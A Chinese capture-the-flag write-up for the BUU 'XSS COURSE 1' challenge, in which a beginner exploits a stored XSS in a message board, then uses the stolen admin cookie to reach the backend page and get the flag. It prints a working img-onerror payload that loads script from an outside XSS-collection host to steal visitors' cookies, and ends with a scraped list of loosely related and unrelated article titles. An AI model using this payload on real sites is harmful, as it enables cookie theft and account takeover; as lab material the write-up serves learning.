前言:啊啊啊啊!我蚌埠住了,在网上找的wp就一个两个的,跟着做,作为一个pwn手web萌新理解起来十分不友好,还没通,非常生气,学了一会,自己做通了。于是开始打算自己写个wp给后人,让后面的萌新能够理解的更透彻,少走我的弯路淦。

咱就是从这个题目入手吧,打开之后是这个界面

根据题目提示,有xss注入相关内容,查看登录,发现走不通,于是从这个吐槽入手。
输入

<script>alert(1)</script>

测试一下

发现没有文字,是不正常的现象。但是也没弹窗,说明存在漏洞,但是可能script被屏蔽了
输入

<img src="#">

发现有个图片标志,说明存在漏洞

则判断存在注入点,XSS注入攻击是一个很大的类,这里我仅从这题出手,这题目是存储型XSS,相关知识自行搜索。参考
具体原理就是相当于我们将我们的木马放到这个网站上了,当别人访问这个网站,我们的木马就会窃取他的cookie等相关信息。这里就是偷取了管理员的cookie

具体操作就是
先通过吐槽框将我们的payload 提交到服务端,服务端会将这个数据保存并显示在留言板上,只要有人访问这个留言板,就会触发我们的代码。

我们的payload 通过在标签中(例如head,body)添加我们自己的XSS平台的javascript源,即每当有人访问留言板就会触发我们的payload 并且会引入我们的JS文件。

这里就提到一个重点了,自己的XSS平台,这个东西兄弟们可以理解为一个远程木马服务器,如果有访问,我们的服务器上就会获取他的信息。

那么我们应该如何搭建自己的"木马服务器"呢,这里其实网上都有教程,不过需要内网穿透,而我们老白嫖怪了,网上有个免费的在线xss测试平台,这里把链接放出来XSS平台
大家自行注册,登录进去后,大家先创一个项目

项目中勾取这个代码

点击查看代码

如果你读过别人的wp你会发现有个东西很像别人的代码,就是这里

<img src=x οnerrοr=s=createElement('script');body.appendChild(s);s.src='//xss.yt/SFTX';>

代码具体意思就是
它使用>标签的onerror事件来执行一个JavaScript代码块。当图片加载失败时,onerror事件将被触发,从而执行该代码块。该代码块创建了一个script元素,并将其src属性设置为//xss.yt/SFTX。然后,它将该元素添加到文档的头部。这意味着,当页面加载时,该脚本将被下载并执行,从而允许攻击者注入恶意代码并执行任意操作。
我们复制此代码提交

再访问


我们发现

已经成功植入代码
回到项目内容查看

发现2个头

在第二个头中我们发现了admin的cookie以及url

于是我们构造包,访问http://c1ca7eb7-d615-4731-893e-33ae9f28ce2a.node4.buuoj.cn:81/backend/admin.php
ps:可以类比推理出这个文件位置
如果cookie不对,它会显示这个

把cookie改掉为admin的

获取flag

BUU XSS COURSE 1 wp XSS平台在线注册相关推荐

  1. XSS平台的用法、存储型XSS、Dom based XSS

    XSS平台的用法.存储型XSS.Dom based XSS 如何使用XSS平台 这里介绍一种常用的xss平台.https://xsspt.com/ 如果xss的payload比较复杂的话,我们可以使用 ...

  2. Java接口xss,Java审计之XSS篇

    Java审计之XSS篇 0x00 前言 继续 学习一波Java审计的XSS漏洞的产生过程和代码. 0x01 Java 中XSS漏洞代码分析 xss原理 xss产生过程: 后台未对用户输入进行检查或过滤 ...

  3. 【XSS漏洞03】XSS漏洞验证、语句构造与绕过方法

    目录 1 漏洞验证相关概念 2 XSS漏洞验证 2.1 常见POC 2.2 反射型XSS漏洞验证 2.3 存储型XSS漏洞验证 2.4 DOM型XSS漏洞验证 3 XSS语句构造与绕过 3.1 XSS ...

  4. 【XSS漏洞-02】XSS靶场介绍(含BlueLotus_XSSReceiver、DVWA、XSS-labs等)

    1 XSS靶场简介 XSS-labs:一款以练习测试XSS思路和命令的闯关游戏,主要是以反射型XSS漏洞为主. DVWA:一个功能较全的靶场环境,漏洞类型齐全,包含在XSS三种类型的漏洞,各有4个级别 ...

  5. XSS学习笔记:XSS Game(xss.pwnfunction.com)1-11通关全解

    前言 继续学习XSS 本篇是XSS Game平台的通关全解 1.Ma Spaghet! 源码 一个不安全的方式 直接get传输somebody 输入123看看位置 ?somebody=123 那就很简 ...

  6. XSS专栏之常见xss总结备忘

    layout: post title: XSS专栏 category: Vulnerability_mining tags: XSS keywords: XSS,CSP 前言 开始总结一些xss的想法 ...

  7. 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录

    XSS: 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一.跨站脚本漏洞(XSS) XSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发 ...

  8. 【XSS漏洞-01】XSS漏洞简介、危害与分类及验证

    目录 1 XSS漏洞简介 2 XSS漏洞危害 3 XSS漏洞分类 3.1 反射型XSS 3.2 存储型XSS 3.3 DOM型XSS 3.3.1 节点树模型 3.3.2 DOM型XSS 4 漏洞验证 ...

  9. php xss速查表,2020跨站脚本[xss]速查表 xss cheat sheet

    此跨站脚本(XSS)备忘单包含许多向量,可以帮助您绕过WAF和过滤器.您可以通过事件,标签或浏览器选择向量,每个向量都包含概念证明. 该备忘单会在2020年进行定期更新. 最近更新:2020年6月4日 ...

最新文章

  1. poj3617 贪心
  2. ubuntu 设置开机启动与关闭开机启动(适用于部分linux系统)
  3. php7过滤,PHP7过滤unserialize()
  4. 【渝粤题库】陕西师范大学201281 民法作业
  5. etmvc mysql乱码_Etmvc学习文档
  6. Nisus Writer Pro for Mac拆分视图和注释技巧
  7. Vim vimrc配置
  8. ASP.NET MVC 5 - 入门
  9. 如何快速开发一款APP
  10. 第十五周博客作业西北师范大学|李晓婷
  11. html中span隐藏属性,span标签的class属性
  12. Ubuntu 禁用Guest用户
  13. linux乌班图做服务器,使用 Ubuntu 16.04 搭建全能服务器
  14. 双十一健身运动装备有哪些值得买?运动好物推荐分享
  15. Springboot文件上传报错:failed to convert java.lang.String to org.springframework.util.unit.DataSize
  16. 记参加哈工大SCIR(赛尔)实验室笔试
  17. C语言计算今天是一年的第几周
  18. 搜图网vvic商品详情api接口
  19. 手把手写算法(学个语言)
  20. Angular 已死,React 已凉,Vue3.0 称王!

热门文章

  1. 网上商城购物系统的优势和建站方法
  2. 安川与欧姆龙Plc通讯设置方法
  3. 西门子S7-1200PLC双轴定位算法电池焊接控制博图程序案例,触摸屏画面采用威纶触摸屏
  4. PPT结尾页只会写“谢谢”?用这些结尾,让你惊艳全场
  5. 遨博协作机器人ROS开发 - 机械臂自主避障
  6. LINUX矩阵键盘简单介绍,介绍一种新型的矩阵键盘电路
  7. HTML5七夕情人节表白网页(庆祝生日蛋糕烟花特效) HTML+CSS+JavaScript
  8. 618还是购书才最实在
  9. matlab局部趋势线,自动趋势线 局部极点
  10. 从零开始学单片机c语言 pdf,从零开始学习单片机.pdf